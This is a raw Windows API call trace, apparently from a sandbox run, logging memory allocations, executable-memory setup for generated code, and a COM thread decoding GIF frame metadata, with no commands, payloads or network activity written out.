0xc17f98 [0132.851] malloc (_Size=0xc) returned 0xc13460 [0132.851] malloc (_Size=0xc) returned 0xc135e0 [0132.851] malloc (_Size=0x4) returned 0xc13768 [0132.851] malloc (_Size=0x30) returned 0xc14ba8 [0132.851] malloc (_Size=0xc) returned 0xc13490 [0132.851] malloc (_Size=0xc) returned 0xc10d28 [0132.852] malloc (_Size=0x4) returned 0xc13888 [0132.852] malloc (_Size=0x30) returned 0xc14978 [0132.852] malloc (_Size=0xc) returned 0xc10cb0 [0132.852] malloc (_Size=0xc) returned 0xc10c68 [0132.852] malloc (_Size=0x8) returned 0xc137a8 [0132.852] malloc (_Size=0xc) returned 0xc10cf8 [0132.852] malloc (_Size=0xc) returned 0xc10cc8 [0132.852] malloc (_Size=0xc) returned 0xc10c80 [0132.852] malloc (_Size=0x4) returned 0xc13778 [0132.852] malloc (_Size=0x34) returned 0xc138d8 [0132.852] malloc (_Size=0xc) returned 0xc10d10 [0132.852] malloc (_Size=0xc) returned 0xc10ce0 [0132.852] malloc (_Size=0x4) returned 0xc138b8 [0132.852] malloc (_Size=0x34) returned 0xc13918 [0132.852] malloc (_Size=0xc) returned 0xc10c98 [0132.852] malloc (_Size=0xc) returned 0xc10a40 [0132.852] malloc (_Size=0x4) returned 0xc13788 [0132.852] malloc (_Size=0x34) returned 0xc13958 [0132.852] malloc (_Size=0xc) returned 0xc10998 [0132.853] malloc (_Size=0xc) returned 0xc10b18 [0132.853] malloc (_Size=0x4) returned 0xc13738 [0132.853] malloc (_Size=0x30) returned 0xc149b0 [0132.853] malloc (_Size=0xc) returned 0xc10980 [0132.853] malloc (_Size=0xc) returned 0xc10b00 [0132.853] malloc (_Size=0x8) returned 0xc13838 [0132.853] malloc (_Size=0xc) returned 0xc10a28 [0132.853] malloc (_Size=0xc) returned 0xc10a10 [0132.853] malloc (_Size=0xc) returned 0xc109f8 [0132.853] malloc (_Size=0x4) returned 0xc13718 [0132.853] malloc (_Size=0x34) returned 0xc13998 [0132.853] malloc (_Size=0xc) returned 0xc10a58 [0132.853] malloc (_Size=0xc) returned 0xc10a70 [0132.853] QueryPerformanceCounter (in: lpPerformanceCount=0x755f764 | out: lpPerformanceCount=0x755f764*=3095167249133) returned 1 [0132.854] srand (_Seed=0xa658283d) [0132.854] rand () returned 28805 [0132.854] RtlEncodeSystemPointer (Pointer=0xa65858b8) returned 0x906af447 [0132.854] GetTickCount () returned 0x1d6c0a7 [0132.854] rand () returned 10405 [0132.854] GetTickCount () returned 0x1d6c0a7 [0132.854] rand () returned 20284 [0132.854] GetTickCount () returned 0x1d6c0a7 [0132.854] rand () returned 30143 [0132.854] GetTickCount () returned 0x1d6c0a7 [0132.854] rand () returned 24014 [0132.854] GetTickCount () returned 0x1d6c0a7 [0132.854] rand () returned 21385 [0132.854] GetTickCount () returned 0x1d6c0a7 [0132.854] rand () returned 26259 [0132.854] GetTickCount () returned 0x1d6c0a7 [0132.854] rand () returned 5875 [0132.854] GetTickCount () returned 0x1d6c0a7 [0132.854] rand () returned 14030 [0132.854] GetTickCount () returned 0x1d6c0a7 [0132.854] rand () returned 15358 [0132.854] GetTickCount () returned 0x1d6c0a7 [0132.854] rand () returned 22296 [0132.854] GetTickCount () returned 0x1d6c0a7 [0132.854] rand () returned 15097 [0132.854] GetTickCount () returned 0x1d6c0a7 [0132.854] rand () returned 4157 [0132.854] GetTickCount () returned 0x1d6c0a7 [0132.854] rand () returned 27754 [0132.862] malloc (_Size=0xc) returned 0xc10c08 [0132.862] malloc (_Size=0xc) returned 0xc10b90 [0132.862] malloc (_Size=0x10) returned 0xc10ba8 [0132.862] malloc (_Size=0x28) returned 0xc11ed0 [0132.862] free (_Block=0xc10ba8) [0132.862] malloc (_Size=0x58) returned 0xc139d8 [0132.862] free (_Block=0xc11ed0) [0132.862] malloc (_Size=0x30) returned 0xc149e8 [0132.862] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x4) returned 0x7620000 [0132.863] VirtualQuery (in: lpAddress=0x7620000, lpBuffer=0x755f664, dwLength=0x1c | out: lpBuffer=0x755f664*(BaseAddress=0x7620000, AllocationBase=0x7620000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.863] VirtualProtect (in: lpAddress=0x7620000, dwSize=0x1000, flNewProtect=0x10, lpflOldProtect=0x755f680 | out: lpflOldProtect=0x755f680*=0x4) returned 1 [0132.904] VirtualQuery (in: lpAddress=0x7620000, lpBuffer=0x755f644, dwLength=0x1c | out: lpBuffer=0x755f644*(BaseAddress=0x7620000, AllocationBase=0x7620000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x10, Type=0x20000)) returned 0x1c [0132.904] VirtualProtect (in: lpAddress=0x7620000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x755f660 | out: lpflOldProtect=0x755f660*=0x10) returned 1 [0132.906] memcpy_s (in: _Destination=0x7620000, _DestinationSize=0x1000, _Source=0x7609018, _SourceSize=0xf68 | out: _Destination=0x7620000) returned 0x0 [0132.906] VirtualQuery (in: lpAddress=0x7620000, lpBuffer=0x755f644, dwLength=0x1c | out: lpBuffer=0x755f644*(BaseAddress=0x7620000, AllocationBase=0x7620000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0132.906] VirtualProtect (in: lpAddress=0x7620000, dwSize=0x1000, flNewProtect=0x10, lpflOldProtect=0x755f660 | out: lpflOldProtect=0x755f660*=0x40) returned 1 [0132.913] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x7620000, dwSize=0xf68) returned 1 [0132.913] malloc (_Size=0x8) returned 0xc13858 [0132.913] malloc (_Size=0x4) returned 0xc137b8 [0132.913] swprintf_s (in: _Dst=0x755fc6c, _SizeInWords=0x1a, _Format="%s%s%d" | out: _Dst="dowYouLikeLoop1") returned 15 [0132.913] free (_Block=0xc123e0) [0132.913] free (_Block=0xc12408) [0132.913] free (_Block=0xc123b8) [0132.913] free (_Block=0xc12378) [0132.913] ResetEvent (hEvent=0x398) returned 1 [0132.914] WaitForSingleObject (hHandle=0x398, dwMilliseconds=0x3e8) returned 0x102 [0133.995] VirtualFree (lpAddress=0x75e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.996] free (_Block=0xc14be0) [0133.996] VirtualFree (lpAddress=0x7600000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0133.997] VirtualFree (lpAddress=0x7601000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0133.997] VirtualFree (lpAddress=0x7602000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0133.997] VirtualFree (lpAddress=0x7603000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0133.998] VirtualFree (lpAddress=0x7604000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0133.998] VirtualFree (lpAddress=0x7605000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0133.998] VirtualFree (lpAddress=0x7606000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0133.999] VirtualFree (lpAddress=0x7607000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0133.999] VirtualFree (lpAddress=0x7608000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0133.999] VirtualFree (lpAddress=0x7609000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.000] VirtualFree (lpAddress=0x760a000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.000] VirtualFree (lpAddress=0x760b000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.000] VirtualFree (lpAddress=0x760c000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.001] VirtualFree (lpAddress=0x760d000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.001] VirtualFree (lpAddress=0x760e000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.001] VirtualFree (lpAddress=0x7610000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.002] VirtualFree (lpAddress=0x7611000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.002] VirtualFree (lpAddress=0x7612000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.003] VirtualFree (lpAddress=0x7613000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.003] VirtualFree (lpAddress=0x7614000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.003] VirtualFree (lpAddress=0x7615000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.004] VirtualFree (lpAddress=0x7616000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.004] VirtualFree (lpAddress=0x7617000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.004] VirtualFree (lpAddress=0x7618000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.005] VirtualFree (lpAddress=0x7619000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.005] VirtualFree (lpAddress=0x761a000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.005] VirtualFree (lpAddress=0x761b000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.006] VirtualFree (lpAddress=0x761c000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.006] VirtualFree (lpAddress=0x761d000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.006] VirtualFree (lpAddress=0x761e000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.007] VirtualFree (lpAddress=0x761f000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0134.007] WaitForSingleObject (hHandle=0x398, dwMilliseconds=0xffffffff) returned 0x0 [0159.332] ResetEvent (hEvent=0x398) returned 1 [0159.332] WaitForSingleObject (hHandle=0x398, dwMilliseconds=0x3e8) returned 0x102 [0160.711] WaitForSingleObject (hHandle=0x398, dwMilliseconds=0xffffffff) returned 0x0 [0187.670] VirtualFree (lpAddress=0x7620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.670] free (_Block=0xc149e8) [0187.670] free (_Block=0xc175c8) [0187.671] free (_Block=0xc5a7d0) [0187.671] ResetEvent (hEvent=0x398) returned 1 [0187.671] WaitForSingleObject (hHandle=0x398, dwMilliseconds=0x3e8) Thread: id = 43 os_tid = 0xa6c [0133.622] GetCurrentThreadId () returned 0xa6c [0188.028] RtlTryEnterCriticalSection (CriticalSection=0x6cd09fe8) returned 1 [0188.028] GetCurrentThreadId () returned 0xa6c Thread: id = 44 os_tid = 0x1394 [0137.248] GetCurrentThreadId () returned 0x1394 Thread: id = 46 os_tid = 0x354 [0160.110] GetCurrentThreadId () returned 0x354 [0160.112] GetModuleHandleExW (in: dwFlags=0x4, lpModuleName=0x6dd5cca0, phModule=0xa1fff7c | out: phModule=0xa1fff7c*=0x6d6d0000) returned 1 [0160.113] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0160.113] ConvertThreadToFiber (lpParameter=0x0) returned 0x6dec68 [0160.114] CreateFiber (dwStackSize=0x8000, lpStartAddress=0x6da92660, lpParameter=0xcfe4dc) returned 0x6dcfb8 [0160.116] SwitchToFiber (lpFiber=0x6dcfb8) [0160.116] CoCreateInstance (in: rclsid=0x6d7210f8*(Data1=0x317d06e8, Data2=0x5f24, Data3=0x433d, Data4=([0]=0xbd, [1]=0xf7, [2]=0x79, [3]=0xce, [4]=0x68, [5]=0xd8, [6]=0xab, [7]=0xc2)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d7210e8*(Data1=0xec5ec8a9, Data2=0xc395, Data3=0x4314, Data4=([0]=0x9c, [1]=0x77, [2]=0x54, [3]=0xd7, [4]=0xa9, [5]=0x35, [6]=0xff, [7]=0x70)), ppv=0xcfe540 | out: ppv=0xcfe540*=0x8cea80) returned 0x0 [0160.138] IUnknown:AddRef (This=0x8cea80) returned 0x2 [0160.140] QISearch (in: that=0x6d7f78, pqit=0x6d758500, riid=0x6bdc6d64*(Data1=0xc3933843, Data2=0xc24b, Data3=0x45a2, Data4=([0]=0x82, [1]=0x98, [2]=0xb4, [3]=0x62, [4]=0xf5, [5]=0x9d, [6]=0xaa, [7]=0xf2)), ppv=0xc53ba8 | out: that=0x6d7f78, ppv=0xc53ba8*=0x0) returned 0x80004002 [0160.140] IUnknown:AddRef (This=0x6d7f78) returned 0x4 [0160.140] QISearch (in: that=0x6d7f78, pqit=0x6d758500, riid=0x6bdc6d84*(Data1=0x3a55501a, Data2=0xbdcc, Data3=0x4e63, Data4=([0]=0x96, [1]=0xbc, [2]=0x4d, [3]=0xdb, [4]=0x6f, [5]=0x44, [6]=0xcc, [7]=0xdd)), ppv=0xa2ffa2c | out: that=0x6d7f78, ppv=0xa2ffa2c*=0x0) returned 0x80004002 [0160.140] QISearch (in: that=0x6d7f78, pqit=0x6d758500, riid=0x6bdc6d64*(Data1=0xc3933843, Data2=0xc24b, Data3=0x45a2, Data4=([0]=0x82, [1]=0x98, [2]=0xb4, [3]=0x62, [4]=0xf5, [5]=0x9d, [6]=0xaa, [7]=0xf2)), ppv=0xa2ffab8 | out: that=0x6d7f78, ppv=0xa2ffab8*=0x0) returned 0x80004002 [0160.142] memcpy_s (in: _Destination=0xa2fd9c0, _DestinationSize=0x1000, _Source=0x9ef65cc, _SourceSize=0x426 | out: _Destination=0xa2fd9c0) returned 0x0 [0160.142] GetCurrentThreadId () returned 0x354 [0160.142] GetCurrentThreadId () returned 0x354 [0160.143] QueryPerformanceCounter (in: lpPerformanceCount=0xa2fd838 | out: lpPerformanceCount=0xa2fd838*=3097896223159) returned 1 [0160.143] GetCurrentThreadId () returned 0x354 [0160.146] memcpy_s (in: _Destination=0x9ef85d8, _DestinationSize=0x426, _Source=0xa2fd9c0, _SourceSize=0x426 | out: _Destination=0x9ef85d8) returned 0x0 [0160.146] GetCurrentThreadId () returned 0x354 [0160.147] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x426) returned 0x6dd2b8 [0160.147] memcpy_s (in: _Destination=0x6dd2b8, _DestinationSize=0x426, _Source=0x9ef85d8, _SourceSize=0x426 | out: _Destination=0x6dd2b8) returned 0x0 [0160.147] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef85d8 | out: hHeap=0x5e0000) returned 1 [0160.147] memcpy_s (in: _Destination=0xc5cfe0, _DestinationSize=0x426, _Source=0x6dd2b8, _SourceSize=0x426 | out: _Destination=0xc5cfe0) returned 0x0 [0160.148] memcpy_s (in: _Destination=0xc59004, _DestinationSize=0xd, _Source=0x6dd2b8, _SourceSize=0xd | out: _Destination=0xc59004) returned 0x0 [0160.149] memcpy_s (in: _Destination=0xc5e3f0, _DestinationSize=0x4, _Source=0x6dd5c8, _SourceSize=0x4 | out: _Destination=0xc5e3f0) returned 0x0 [0160.150] memcpy_s (in: _Destination=0xc5e584, _DestinationSize=0x9, _Source=0x6dd5ce, _SourceSize=0x9 | out: _Destination=0xc5e584) returned 0x0 [0160.150] CompareStringOrdinal (lpString1="Left", cchCount1=4, lpString2="Left", cchCount2=4, bIgnoreCase=1) returned 2 [0160.150] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0160.151] GetProcAddress (hModule=0x76da0000, lpProcName="PropVariantClear") returned 0x76e02520 [0160.151] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0xa2ffa34 | out: lpflOldProtect=0xa2ffa34*=0x4) returned 1 [0160.152] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.152] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.152] CompareStringOrdinal (lpString1="Top", cchCount1=3, lpString2="Top", cchCount2=3, bIgnoreCase=1) returned 2 [0160.152] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.152] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.152] CompareStringOrdinal (lpString1="Width", cchCount1=5, lpString2="Width", cchCount2=5, bIgnoreCase=1) returned 2 [0160.152] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.152] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.152] CompareStringOrdinal (lpString1="Height", cchCount1=6, lpString2="Height", cchCount2=6, bIgnoreCase=1) returned 2 [0160.152] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.152] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.152] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.153] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.153] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.153] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.153] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.153] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.153] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.153] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.153] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.153] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.153] CompareStringOrdinal (lpString1="Disposal", cchCount1=8, lpString2="Disposal", cchCount2=8, bIgnoreCase=1) returned 2 [0160.153] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.153] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.154] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.157] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.158] CompareStringOrdinal (lpString1="TransparencyFlag", cchCount1=16, lpString2="TransparencyFlag", cchCount2=16, bIgnoreCase=1) returned 2 [0160.158] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.158] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.158] CompareStringOrdinal (lpString1="Delay", cchCount1=5, lpString2="Delay", cchCount2=5, bIgnoreCase=1) returned 2 [0160.158] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.158] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.158] CompareStringOrdinal (lpString1="TransparentColorIndex", cchCount1=21, lpString2="TransparentColorIndex", cchCount2=21, bIgnoreCase=1) returned 2 [0160.158] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.158] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.158] PropVariantClear (in: pvar=0xa2ffab8 | out: pvar=0xa2ffab8) returned 0x0 [0160.158] PropVariantClear (in: pvar=0xa2ffac8 | out: pvar=0xa2ffac8) returned 0x0 [0160.162] CompareStringOrdinal (lpString1="Signature", cchCount1=9, lpString2="Signature", cchCount2=9, bIgnoreCase=1) returned 2 [0160.162] PropVariantClear (in: pvar=0xa2ffb90 | out: pvar=0xa2ffb90) returned 0x0 [0160.162] PropVariantClear (in: pvar=0xa2ffba0 | out: pvar=0xa2ffba0) returned 0x0 [0160.162] CompareStringOrdinal (lpString1="Width", cchCount1=5, lpString2="Width", cchCount2=5, bIgnoreCase=1) returned 2 [0160.162] PropVariantClear (in: pvar=0xa2ffb90 | out: pvar=0xa2ffb90) returned 0x0 [0160.162] PropVariantClear (in: pvar=0xa2ffba0 | out: pvar=0xa2ffba0) returned 0x0 [0160.162] CompareStringOrdinal (lpString1="Height", cchCount1=6, lpString2="Height", cchCount2=6, bIgnoreCase=1) returned 2 [0160.162] PropVariantClear (in: pvar=0xa2ffb90 | out: pvar=0xa2ffb90) returned 0x0 [0160.162] PropVariantClear (in: pvar=0xa2ffba0 | out: pvar=0xa2ffba0) returned 0x0 [0160.162] PropVariantClear (in: pvar=0xa2ffb90 | out: pvar=0xa2ffb90) returned 0x0 [0160.162] PropVariantClear (in: pvar=0xa2ffba0 | out: pvar=0xa2ffba0) returned 0x0 [0160.162] PropVariantClear (in: pvar=0xa2ffb90 | out: pvar=0xa2ffb90) returned 0x0 [0160.162] PropVariantClear (in: pvar=0xa2ffba0 | out: pvar=0xa2ffba0) returned 0x0 [0160.162] PropVariantClear (in: pvar=0xa2ffb90 | out: pvar=0xa2ffb90) returned 0x0 [0160.162] PropVariantClear (in: pvar=0xa2ffba0 | out: pvar=0xa2ffba0) returned 0x0 [0160.162] PropVariantClear (in: pvar=0xa2ffb90 | out: pvar=0xa2ffb90) returned 0x0 [0160.162] PropVariantClear (in: pvar=0xa2ffba0 | out: pvar=0xa2ffba0) returned 0x0 [0160.163] PropVariantClear (in: pvar=0xa2ffb90 | out: pvar=0xa2ffb90) returned 0x0 [0160.163] PropVariantClear (in: pvar=0xa2ffba0 | out: pvar=0xa2ffba0) returned 0x0 [0160.163] PropVariantClear (in: pvar=0xa2ffb90 | out: pvar=0xa2ffb90) returned 0x0 [0160.163] PropVariantClear (in: pvar=0xa2ffba0 | out: pvar=0xa2ffba0) returned 0x0 [0160.163] PropVariantClear (in: pvar=0xa2ffb90 | out: pvar=0xa2ffb90) returned 0x0 [0160.163] PropVariantClear (in: pvar=0xa2ffba0 | out: pvar=0xa2ffba0) returned 0x0 [0160.163] IntersectRect (in: lprcDst=0xa2ffbd4, lprcSrc1=0xa2ffbb4, lprcSrc2=0xa2ffbc4 | out: lprcDst=0xa2ffbd4) returned 1 [0160.163] EqualRect (lprc1=0xa2ffbb4, lprc2=0xa2ffbd4) returned 1 [0160.163] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x400) returned 0x6ddfb8 [0160.164] MulDiv (nNumber=1368, nNumerator=8, nDenominator=8) returned 1368 [0160.164] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6c) returned 0x63edd8 [0160.165] InitOnceExecuteOnce (in: InitOnce=0x6e895184, InitFn=0x6dd94560, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e895184, Parameter=0x0, Context=0x0) returned 1 [0160.165] GetSystemInfo (in: lpSystemInfo=0xa2ffa48 | out: lpSystemInfo=0xa2ffa48*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507)) [0160.165] memcpy_s (in: _Destination=0xd21e28, _DestinationSize=0x400, _Source=0x6ddfb8, _SourceSize=0x400 | out: _Destination=0xd21e28) returned 0x0 [0160.168] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6dc8a0 [0160.168] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x28) returned 0x6d8068 [0160.168] memcpy_s (in: _Destination=0xc5cfe0, _DestinationSize=0x106, _Source=0x6dd5d8, _SourceSize=0x106 | out: _Destination=0xc5cfe0) returned 0x0 [0160.169] memcpy_s (in: _Destination=0xa2ffc70, _DestinationSize=0xc, _Source=0xd451e0, _SourceSize=0xc | out: _Destination=0xa2ffc70) returned 0x0 [0160.169] SwitchToFiber (lpFiber=0x6dec68) [0160.170] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddfb8 | out: hHeap=0x5e0000) returned 1 [0160.171] IUnknown:Release (This=0x8cea80) returned 0x1 [0160.171] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd2b8 | out: hHeap=0x5e0000) returned 1 [0160.171] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc8e0 | out: hHeap=0x5e0000) returned 1 [0160.172] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7f78 | out: hHeap=0x5e0000) returned 1 [0160.172] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xcfe480*=0x67c, lpdwindex=0xa1fff60 | out: lpdwindex=0xa1fff60) returned 0x0 [0160.179] CoWaitForMultipleHandles (in: dwFlags=0x0, dwTimeout=0x927c0, cHandles=0x1, pHandles=0xcfe480*=0x67c, lpdwindex=0xa1fff60 | out: lpdwindex=0xa1fff60) returned 0x0 [0188.062] DeleteFiber (lpFiber=0x6dcfb8) [0188.062] CoUninitialize () [0188.064] ConvertFiberToThread () returned 1 [0188.064] FreeLibraryAndExitThread (hLibModule=0x6d6d0000, dwExitCode=0x0) [0188.064] RtlTryEnterCriticalSection (CriticalSection=0x6cd09fe8) returned 1 [0188.064] GetCurrentThreadId () returned 0x354